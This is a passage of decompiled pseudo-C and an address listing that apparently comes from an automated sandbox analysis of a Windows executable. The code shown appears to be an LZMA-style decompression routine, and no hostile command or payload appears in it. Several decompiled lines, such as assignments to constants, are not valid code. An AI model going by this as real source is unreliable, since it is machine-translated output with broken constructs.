										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L121;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											goto L145;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											goto L149;
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L120:
												_t394 = __ebp - 0x2c;
												 *_t394 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t394;
												L121:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t401 = __ebp - 0x60;
												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t401;
												goto L124;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L103:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L109:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L113:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t392 = __ebp - 0x2c;
														 *_t392 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t392;
														goto L120;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L112:
														_t369 = __ebp - 0x48;
														 *_t369 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t369;
														goto L113;
													} else {
														goto L110;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L102:
													_t339 = __ebp - 0x48;
													 *_t339 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t339;
													goto L103;
												} else {
													goto L100;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L109;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L124:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t415 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t415;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t415;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											L170:
											_push(0x22);
											_pop(_t567);
											memcpy( *(_t612 - 0x90), _t612 - 0x88, _t567 << 2);
											_t535 = 0;
											L172:
											return _t535;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
						__eax =  *(__ebp - 0x50);
						 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
						__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
						__eax =  *(__ebp - 0x58);
						__esi = __edx + __eax;
						 *(__ebp - 0x54) = __esi;
						__ax =  *__esi;
						__edi = __ax & 0x0000ffff;
						__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
						if( *(__ebp - 0xc) >= __ecx) {
							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
							__cx = __ax;
							__cx = __ax >> 5;
							__eax = __eax - __ecx;
							__edx = __edx + 1;
							 *__esi = __ax;
							 *(__ebp - 0x50) = __edx;
						} else {
							 *(__ebp - 0x10) = __ecx;
							0x800 = 0x800 - __edi;
							0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
							 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
							 *__esi = __cx;
						}
						if( *(__ebp - 0x10) >= 0x1000000) {
							goto L148;
						} else {
							goto L146;
						}
					}
					goto L1;
				}
			}








                                    0x00000000
                                    0x00407395
                                    0x00407395
                                    0x00407399
                                    0x004073be
                                    0x004073c8
                                    0x00000000
                                    0x0040739b
                                    0x0040739b
                                    0x0040739e
                                    0x004073a2
                                    0x004073a5
                                    0x004073a8
                                    0x004073ac
                                    0x004073ac
                                    0x004073af
                                    0x00407489
                                    0x00407489
                                    0x00407490
                                    0x00407490
                                    0x00407493
                                    0x0040749a
                                    0x004074c7
                                    0x004074cb
                                    0x0040752b
                                    0x0040752e
                                    0x00407533
                                    0x00407534
                                    0x00407536
                                    0x00407538
                                    0x0040753b
                                    0x00407447
                                    0x00407447
                                    0x00407447
                                    0x00406be3
                                    0x00406be3
                                    0x00406be3
                                    0x00406bec
                                    0x00000000
                                    0x00000000
                                    0x00406bf2
                                    0x00000000
                                    0x00406bfd
                                    0x00000000
                                    0x00000000
                                    0x00406c06
                                    0x00406c09
                                    0x00406c0c
                                    0x00406c10
                                    0x00000000
                                    0x00000000
                                    0x00406c16
                                    0x00406c19
                                    0x00406c1b
                                    0x00406c1c
                                    0x00406c1f
                                    0x00406c21
                                    0x00406c22
                                    0x00406c24
                                    0x00406c27
                                    0x00406c2c
                                    0x00406c31
                                    0x00406c3a
                                    0x00406c4d
                                    0x00406c50
                                    0x00406c5c
                                    0x00406c84
                                    0x00406c86
                                    0x00406c94
                                    0x00406c94
                                    0x00406c98
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00406c88
                                    0x00406c88
                                    0x00406c8b
                                    0x00406c8c
                                    0x00406c8c
                                    0x00000000
                                    0x00406c88
                                    0x00406c62
                                    0x00406c67
                                    0x00406c67
                                    0x00406c70
                                    0x00406c78
                                    0x00406c7b
                                    0x00000000
                                    0x00406c81
                                    0x00406c81
                                    0x00000000
                                    0x00406c81
                                    0x00000000
                                    0x00406c9e
                                    0x00406c9e
                                    0x00406ca2
                                    0x0040754e
                                    0x00000000
                                    0x0040754e
                                    0x00406cab
                                    0x00406cbb
                                    0x00406cbe
                                    0x00406cc1
                                    0x00406cc1
                                    0x00406cc1
                                    0x00406cc4
                                    0x00406cc8
                                    0x00000000
                                    0x00000000
                                    0x00406cca
                                    0x00406cd0
                                    0x00406cfa
                                    0x00406d00
                                    0x00406d07
                                    0x00000000
                                    0x00406d07
                                    0x00406cd6
                                    0x00406cd9
                                    0x00406cde
                                    0x00406cde
                                    0x00406ce9
                                    0x00406cf1
                                    0x00406cf4
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00406d39
                                    0x00406d3f
                                    0x00406d42
                                    0x00406d4f
                                    0x00406d57
                                    0x00000000
                                    0x00000000
                                    0x00406d0e
                                    0x00406d0e
                                    0x00406d12
                                    0x0040755d
                                    0x00000000
                                    0x0040755d
                                    0x00406d1e
                                    0x00406d29
                                    0x00406d29
                                    0x00406d29
                                    0x00406d2c
                                    0x00406d2f
                                    0x00406d32
                                    0x00406d37
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x004073ce
                                    0x004073ce
                                    0x004073d4
                                    0x004073da
                                    0x004073e0
                                    0x004073fa
                                    0x004073fd
                                    0x00407403
                                    0x0040740e
                                    0x0040740e
                                    0x00407410
                                    0x004073e2
                                    0x004073e2
                                    0x004073f1
                                    0x004073f5
                                    0x004073f5
                                    0x0040741a
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0040741c
                                    0x00407420
                                    0x004075cf
                                    0x00000000
                                    0x004075cf
                                    0x0040742c
                                    0x00407433
                                    0x0040743b
                                    0x0040743e
                                    0x00407441
                                    0x00407441
                                    0x00000000
                                    0x00000000
                                    0x00406d5f
                                    0x00406d61
                                    0x00406d64
                                    0x00406dd5
                                    0x00406dd8
                                    0x00406ddb
                                    0x00406de2
                                    0x00406dec
                                    0x00000000
                                    0x00406dec
                                    0x00406d66
                                    0x00406d6a
                                    0x00406d6d
                                    0x00406d6f
                                    0x00406d72
                                    0x00406d75
                                    0x00406d77
                                    0x00406d7a
                                    0x00406d7c
                                    0x00406d81
                                    0x00406d84
                                    0x00406d87
                                    0x00406d8b
                                    0x00406d92
                                    0x00406d95
                                    0x00406d9c
                                    0x00406da0
                                    0x00406da8
                                    0x00406da8
                                    0x00406da8
                                    0x00406da2
                                    0x00406da2
                                    0x00406da2
                                    0x00406d97
                                    0x00406d97
                                    0x00406d97
                                    0x00406dac
                                    0x00406daf
                                    0x00406dcd
                                    0x00406dcf
                                    0x00000000
                                    0x00406db1
                                    0x00406db1
                                    0x00406db4
                                    0x00406db7
                                    0x00406dba
                                    0x00406dbc
                                    0x00406dbc
                                    0x00406dbc
                                    0x00406dbf
                                    0x00406dc2
                                    0x00406dc4
                                    0x00406dc5
                                    0x00406dc8
                                    0x00000000
                                    0x00406dc8
                                    0x00000000
                                    0x00406ffe
                                    0x00407002
                                    0x00407020
                                    0x00407023
                                    0x0040702a
                                    0x0040702d
                                    0x00407030
                                    0x00407033
                                    0x00407036
                                    0x00407039
                                    0x0040703b
                                    0x00407042
                                    0x00407043
                                    0x00407045
                                    0x00407048
                                    0x0040704b
                                    0x0040704e
                                    0x0040704e
                                    0x00407053
                                    0x00000000
                                    0x00407053
                                    0x00407004
                                    0x00407007
                                    0x0040700a
                                    0x00407014
                                    0x00000000
                                    0x00000000
                                    0x00407068
                                    0x0040706c
                                    0x0040708f
                                    0x00407092
                                    0x00407095
                                    0x0040709f
                                    0x0040706e
                                    0x0040706e
                                    0x00407071
                                    0x00407074
                                    0x00407077
                                    0x00407084
                                    0x00407087
                                    0x00407087
                                    0x00000000
                                    0x00000000
                                    0x004070ab
                                    0x004070af
                                    0x00000000
                                    0x00000000
                                    0x004070b5
                                    0x004070b9
                                    0x00000000
                                    0x00000000
                                    0x004070bf
                                    0x004070c1
                                    0x004070c5
                                    0x004070c5
                                    0x004070c8
                                    0x004070cc
                                    0x00000000
                                    0x00000000
                                    0x0040711c
                                    0x00407120
                                    0x00407127
                                    0x0040712a
                                    0x0040712d
                                    0x00407137
                                    0x00000000
                                    0x00407137
                                    0x00407122
                                    0x00000000
                                    0x00000000
                                    0x00407143
                                    0x00407147
                                    0x0040714e
                                    0x00407151
                                    0x00407154
                                    0x00407149
                                    0x00407149
                                    0x00407149
                                    0x00407157
                                    0x0040715a
                                    0x0040715d
                                    0x0040715d
                                    0x00407160
                                    0x00407163
                                    0x00407166
                                    0x00407166
                                    0x00407169
                                    0x00407170
                                    0x00407175
                                    0x00000000
                                    0x00000000
                                    0x00407203
                                    0x00407203
                                    0x00407207
                                    0x004075a5
                                    0x00000000
                                    0x004075a5
                                    0x0040720d
                                    0x00407210
                                    0x00407213
                                    0x00407217
                                    0x0040721a
                                    0x00407220
                                    0x00407222
                                    0x00407222
                                    0x00407222
                                    0x00407225
                                    0x00407228
                                    0x00000000
                                    0x00000000
                                    0x00406df8
                                    0x00406df8
                                    0x00406dfc
                                    0x00407569
                                    0x00000000
                                    0x00407569
                                    0x00406e02
                                    0x00406e05
                                    0x00406e08
                                    0x00406e0c
                                    0x00406e0f
                                    0x00406e15
                                    0x00406e17
                                    0x00406e17
                                    0x00406e17
                                    0x00406e1a
                                    0x00406e1d
                                    0x00406e1d
                                    0x00406e20
                                    0x00406e23
                                    0x00000000
                                    0x00000000
                                    0x00406e29
                                    0x00406e2f
                                    0x00000000
                                    0x00000000
                                    0x00406e35
                                    0x00406e35
                                    0x00406e39
                                    0x00406e3c
                                    0x00406e3f
                                    0x00406e42
                                    0x00406e45
                                    0x00406e46
                                    0x00406e49
                                    0x00406e4b
                                    0x00406e51
                                    0x00406e54
                                    0x00406e57
                                    0x00406e5a
                                    0x00406e5d
                                    0x00406e60
                                    0x00406e63
                                    0x00406e7f
                                    0x00406e82
                                    0x00406e85
                                    0x00406e88
                                    0x00406e8f
                                    0x00406e93
                                    0x00406e95
                                    0x00406e99
                                    0x00406e65
                                    0x00406e65
                                    0x00406e69
                                    0x00406e71
                                    0x00406e76
                                    0x00406e78
                                    0x00406e7a
                                    0x00406e7a
                                    0x00406e9c
                                    0x00406ea3
                                    0x00406ea6
                                    0x00000000
                                    0x00406eac
                                    0x00000000
                                    0x00406eac
                                    0x00000000
                                    0x00406eb1
                                    0x00406eb1
                                    0x00406eb5
                                    0x00407575
                                    0x00000000
                                    0x00407575
                                    0x00406ebb
                                    0x00406ebe
                                    0x00406ec1
                                    0x00406ec5
                                    0x00406ec8
                                    0x00406ece
                                    0x00406ed0
                                    0x00406ed0
                                    0x00406ed0
                                    0x00406ed3
                                    0x00406ed6
                                    0x00406ed6
                                    0x00406ed6
                                    0x00406edc
                                    0x00000000
                                    0x00000000
                                    0x00406ede
                                    0x00406ee1
                                    0x00406ee4
                                    0x00406ee7
                                    0x00406eea
                                    0x00406eed
                                    0x00406ef0
                                    0x00406ef3
                                    0x00406ef6
                                    0x00406ef9
                                    0x00406efc
                                    0x00406f14
                                    0x00406f17
                                    0x00406f1a
                                    0x00406f1d
                                    0x00406f1d
                                    0x00406f20
                                    0x00406f24
                                    0x00406f26
                                    0x00406efe
                                    0x00406efe
                                    0x00406f06
                                    0x00406f0b
                                    0x00406f0d
                                    0x00406f0f
                                    0x00406f0f
                                    0x00406f29
                                    0x00406f30
                                    0x00406f33
                                    0x00000000
                                    0x00406f35
                                    0x00000000
                                    0x00406f35
                                    0x00406f33
                                    0x00406f3a
                                    0x00406f3a
                                    0x00406f3a
                                    0x00406f3a
                                    0x00000000
                                    0x00000000
                                    0x00406f75
                                    0x00406f75
                                    0x00406f79
                                    0x00407581
                                    0x00000000
                                    0x00407581
                                    0x00406f7f
                                    0x00406f82
                                    0x00406f85
                                    0x00406f89
                                    0x00406f8c
                                    0x00406f92
                                    0x00406f94
                                    0x00406f94
                                    0x00406f94
                                    0x00406f97
                                    0x00406f9a
                                    0x00406f9a
                                    0x00406fa0
                                    0x00406f3e
                                    0x00406f3e
                                    0x00406f41
                                    0x00000000
                                    0x00406f41
                                    0x00406fa2
                                    0x00406fa2
                                    0x00406fa5
                                    0x00406fa8
                                    0x00406fab
                                    0x00406fae
                                    0x00406fb1
                                    0x00406fb4
                                    0x00406fb7
                                    0x00406fba
                                    0x00406fbd
                                    0x00406fc0
                                    0x00406fd8
                                    0x00406fdb
                                    0x00406fde
                                    0x00406fe1
                                    0x00406fe1
                                    0x00406fe4
                                    0x00406fe8
                                    0x00406fea
                                    0x00406fc2
                                    0x00406fc2
                                    0x00406fca
                                    0x00406fcf
                                    0x00406fd1
                                    0x00406fd3
                                    0x00406fd3
                                    0x00406fed
                                    0x00406ff4
                                    0x00406ff7
                                    0x00000000
                                    0x00406ff9
                                    0x00000000
                                    0x00406ff9
                                    0x00000000
                                    0x00407286
                                    0x00407286
                                    0x0040728a
                                    0x004075b1
                                    0x00000000
                                    0x004075b1
                                    0x00407290
                                    0x00407293
                                    0x00407296
                                    0x0040729a
                                    0x0040729d
                                    0x004072a3
                                    0x004072a5
                                    0x004072a5
                                    0x004072a5
                                    0x004072a8
                                    0x00000000
                                    0x00000000
                                    0x00407056
                                    0x00407056
                                    0x00407059
                                    0x004073cb
                                    0x004073cb
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00407452
                                    0x00407456
                                    0x00407474
                                    0x00407474
                                    0x00407474
                                    0x0040747b
                                    0x00407482
                                    0x00000000
                                    0x00407482
                                    0x00407458
                                    0x0040745b
                                    0x0040745e
                                    0x00407461
                                    0x00407468
                                    0x00000000
                                    0x00000000
                                    0x00407543
                                    0x00407546
                                    0x00407447
                                    0x00407447
                                    0x00000000
                                    0x00000000
                                    0x0040717d
                                    0x0040717f
                                    0x00407186
                                    0x00407187
                                    0x00407189
                                    0x0040718c
                                    0x00000000
                                    0x00000000
                                    0x00407194
                                    0x00407197
                                    0x0040719a
                                    0x0040719c
                                    0x0040719e
                                    0x0040719e
                                    0x0040719f
                                    0x004071a2
                                    0x004071a9
                                    0x004071ac
                                    0x004071ba
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0040749f
                                    0x0040749f
                                    0x004074a3
                                    0x004075db
                                    0x00000000
                                    0x004075db
                                    0x004074a9
                                    0x004074ac
                                    0x004074af
                                    0x004074b3
                                    0x004074b6
                                    0x004074bc
                                    0x004074be
                                    0x004074be
                                    0x004074be
                                    0x004074c1
                                    0x004074c4
                                    0x004074c4
                                    0x004074c4
                                    0x004074c4
                                    0x00000000
                                    0x00000000
                                    0x004071c2
                                    0x004071c5
                                    0x004071fb
                                    0x0040732b
                                    0x0040732b
                                    0x0040732b
                                    0x0040732b
                                    0x0040732e
                                    0x0040732e
                                    0x00407331
                                    0x00407333
                                    0x004075bd
                                    0x00000000
                                    0x004075bd
                                    0x00407339
                                    0x0040733c
                                    0x00000000
                                    0x00000000
                                    0x00407342
                                    0x00407346
                                    0x00407349
                                    0x00407349
                                    0x00407349
                                    0x00000000
                                    0x00407349
                                    0x004071c7
                                    0x004071c9
                                    0x004071cb
                                    0x004071cd
                                    0x004071d0
                                    0x004071d1
                                    0x004071d3
                                    0x004071d5
                                    0x004071d8
                                    0x004071db
                                    0x004071f1
                                    0x004071f6
                                    0x0040722e
                                    0x0040722e
                                    0x00407232
                                    0x0040725e
                                    0x00407260
                                    0x00407267
                                    0x0040726a
                                    0x0040726d
                                    0x0040726d
                                    0x00407272
                                    0x00407272
                                    0x00407274
                                    0x00407277
                                    0x0040727e
                                    0x00407281
                                    0x004072ae
                                    0x004072ae
                                    0x004072b1
                                    0x004072b4
                                    0x00407328
                                    0x00407328
                                    0x00407328
                                    0x00000000
                                    0x00407328
                                    0x004072b6
                                    0x004072bc
                                    0x004072bf
                                    0x004072c2
                                    0x004072c5
                                    0x004072c8
                                    0x004072cb
                                    0x004072ce
                                    0x004072d1
                                    0x004072d4
                                    0x004072d7
                                    0x004072f0
                                    0x004072f2
                                    0x004072f5
                                    0x004072f6
                                    0x004072f9
                                    0x004072fb
                                    0x004072fe
                                    0x00407300
                                    0x00407302
                                    0x00407305
                                    0x00407307
                                    0x0040730a
                                    0x0040730e
                                    0x00407310
                                    0x00407310
                                    0x00407311
                                    0x00407314
                                    0x00407317
                                    0x004072d9
                                    0x004072d9
                                    0x004072e1
                                    0x004072e6
                                    0x004072e8
                                    0x004072eb
                                    0x004072eb
                                    0x0040731a
                                    0x00407321
                                    0x004072ab
                                    0x004072ab
                                    0x004072ab
                                    0x004072ab
                                    0x00000000
                                    0x00407323
                                    0x00000000
                                    0x00407323
                                    0x00407321
                                    0x00407234
                                    0x00407237
                                    0x00407239
                                    0x0040723c
                                    0x0040723f
                                    0x00407242
                                    0x00407244
                                    0x00407247
                                    0x0040724a
                                    0x0040724a
                                    0x0040724d
                                    0x0040724d
                                    0x00407250
                                    0x00407257
                                    0x0040722b
                                    0x0040722b
                                    0x0040722b
                                    0x0040722b
                                    0x00000000
                                    0x00407259
                                    0x00000000
                                    0x00407259
                                    0x00407257
                                    0x004071dd
                                    0x004071e0
                                    0x004071e2
                                    0x004071e5
                                    0x00000000
                                    0x00000000
                                    0x00406f44
                                    0x00406f44
                                    0x00406f48
                                    0x0040758d
                                    0x00000000
                                    0x0040758d
                                    0x00406f4e
                                    0x00406f51
                                    0x00406f54
                                    0x00406f57
                                    0x00406f5a
                                    0x00406f5d
                                    0x00406f60
                                    0x00406f62
                                    0x00406f65
                                    0x00406f68
                                    0x00406f6b
                                    0x00406f6d
                                    0x00406f6d
                                    0x00406f6d
                                    0x00000000
                                    0x00000000
                                    0x004070cf
                                    0x004070cf
                                    0x004070d3
                                    0x00407599
                                    0x00000000
                                    0x00407599
                                    0x004070d9
                                    0x004070dc
                                    0x004070df
                                    0x004070e2
                                    0x004070e4
                                    0x004070e4
                                    0x004070e4
                                    0x004070e7
                                    0x004070ea
                                    0x004070ed
                                    0x004070f0
                                    0x004070f3
                                    0x004070f6
                                    0x004070f7
                                    0x004070f9
                                    0x004070f9
                                    0x004070f9
                                    0x004070fc
                                    0x004070ff
                                    0x00407102
                                    0x00407105
                                    0x00407105
                                    0x00407105
                                    0x00407108
                                    0x0040710a
                                    0x0040710a
                                    0x00000000
                                    0x00000000
                                    0x0040734c
                                    0x0040734c
                                    0x0040734c
                                    0x00407350
                                    0x00000000
                                    0x00000000
                                    0x00407356
                                    0x00407359
                                    0x0040735c
                                    0x0040735f
                                    0x00407361
                                    0x00407361
                                    0x00407361
                                    0x00407364
                                    0x00407367
                                    0x0040736a
                                    0x0040736d
                                    0x00407370
                                    0x00407373
                                    0x00407374
                                    0x00407376
                                    0x00407376
                                    0x00407376
                                    0x00407379
                                    0x0040737c
                                    0x0040737f
                                    0x00407382
                                    0x00407385
                                    0x00407389
                                    0x0040738b
                                    0x0040738e
                                    0x00000000
                                    0x00407390
                                    0x0040710d
                                    0x0040710d
                                    0x00000000
                                    0x0040710d
                                    0x0040738e
                                    0x004075c3
                                    0x004075e5
                                    0x004075eb
                                    0x004075ed
                                    0x004075f4
                                    0x004075f6
                                    0x004075fd
                                    0x00407601
                                    0x00000000
                                    0x00406bf2
                                    0x004075fa
                                    0x004075fa
                                    0x00000000
                                    0x004075fa
                                    0x00407447
                                    0x004074cd
                                    0x004074d3
                                    0x004074d6
                                    0x004074d9
                                    0x004074dc
                                    0x004074df
                                    0x004074e2
                                    0x004074e5
                                    0x004074e8
                                    0x004074ee
                                    0x00407507
                                    0x0040750a
                                    0x0040750d
                                    0x00407510
                                    0x00407514
                                    0x00407516
                                    0x00407517
                                    0x0040751a
                                    0x004074f0
                                    0x004074f0
                                    0x004074f8
                                    0x004074fd
                                    0x004074ff
                                    0x00407502
                                    0x00407502
                                    0x00407524
                                    0x00000000
                                    0x00407526
                                    0x00000000
                                    0x00407526
                                    0x00407524
                                    0x00000000
                                    0x00407399

                                    Memory Dump Source
                                    • Source File: 00000005.00000002.987514881.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.987509042.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987527452.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
